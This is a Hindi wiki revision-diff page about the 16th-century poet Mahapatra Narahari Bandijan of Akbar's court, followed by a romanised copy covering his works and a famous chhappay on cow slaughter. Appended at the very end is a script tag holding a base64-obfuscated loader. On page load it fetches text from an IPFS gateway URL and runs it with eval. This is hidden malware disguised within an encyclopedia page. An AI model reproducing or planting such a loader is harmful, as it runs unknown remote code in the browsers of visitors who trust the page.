Difference between revisions of "महापात्र नरहरि बंदीजन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*महापात्र नरहरि बंदीजन का जन्म संवत् 1562 में और मृत्यु...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
*महापात्र नरहरि बंदीजन का जन्म संवत् 1562 में और मृत्यु संवत् 1667 में कही जाती है।  
 
*महापात्र नरहरि बंदीजन का जन्म संवत् 1562 में और मृत्यु संवत् 1667 में कही जाती है।  
 
*महापात्र की उपाधि इन्हें [[अकबर]] के दरबार से मिली थी।  
 
*महापात्र की उपाधि इन्हें [[अकबर]] के दरबार से मिली थी।  
*ये 'असनी फतेहपुर' के रहने वाले थे और अकबर के दरबार में इनका बहुत मान था।  
+
*ये '[[असनी]], [[फतेहपुर ज़िला|फतेहपुर]]' के रहने वाले थे और अकबर के दरबार में इनका बहुत मान था।  
 
*इन्होंने छप्पय और कवित्त कहे हैं।  
 
*इन्होंने छप्पय और कवित्त कहे हैं।  
*इनके बनाए दो ग्रंथ परंपरा से प्रसिद्ध हैं - 'रुक्मिणीमंगल' और 'छप्पय नीति'
+
*इनके बनाए दो ग्रंथ परंपरा से प्रसिद्ध हैं - 'रुक्मिणीमंगल' और 'छप्पय नीति'  
 
*एक तीसरा ग्रंथ 'कवित्तसंग्रह' भी खोज में मिला है।  
 
*एक तीसरा ग्रंथ 'कवित्तसंग्रह' भी खोज में मिला है।  
 
*निम्न इनका वह प्रसिद्ध छप्पय है जिस पर कहा जाता है कि अकबर ने 'गो वध' बंद करा दिया था -  
 
*निम्न इनका वह प्रसिद्ध छप्पय है जिस पर कहा जाता है कि अकबर ने 'गो वध' बंद करा दिया था -  
Line 12: Line 12:
 
कह कवि नरहरि अकबर सुनौ बिनवति गउ जोरे करन।
 
कह कवि नरहरि अकबर सुनौ बिनवति गउ जोरे करन।
 
अपराध कौन मोहिं मारियत मुएहु चाम सेवइ चरन</poem>
 
अपराध कौन मोहिं मारियत मुएहु चाम सेवइ चरन</poem>
 
 
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 22: Line 20:
 
==सम्बंधित लेख==
 
==सम्बंधित लेख==
 
{{भारत के कवि}}
 
{{भारत के कवि}}
[[Category:नया पन्ना]]
 
 
[[Category:कवि]][[Category:साहित्य_कोश]]
 
[[Category:कवि]][[Category:साहित्य_कोश]]
 +
[[Category:भक्ति काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:45, 8 January 2012

  • mahapatr narahari bandijan ka janm sanvath 1562 mean aur mrityu sanvath 1667 mean kahi jati hai.
  • mahapatr ki upadhi inhean akabar ke darabar se mili thi.
  • ye 'asani, phatehapur' ke rahane vale the aur akabar ke darabar mean inaka bahut man tha.
  • inhoanne chhappay aur kavitt kahe haian.
  • inake banae do granth paranpara se prasiddh haian - 'rukminimangal' aur 'chhappay niti'
  • ek tisara granth 'kavittasangrah' bhi khoj mean mila hai.
  • nimn inaka vah prasiddh chhappay hai jis par kaha jata hai ki akabar ne 'go vadh' band kara diya tha -

arihu dant tin dharai tahi nahian mari sakatakoi.
ham santat tinu charahian vachan uchcharahian din hoi
amrit pay nit sravahian bachchh mahi thanbhan javahian.
hianduhi madhur n dehian katuk turakahi n piyavahian
kah kavi narahari akabar sunau binavati gu jore karan.
aparadh kaun mohian mariyat muehu cham sevi charan


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sambandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>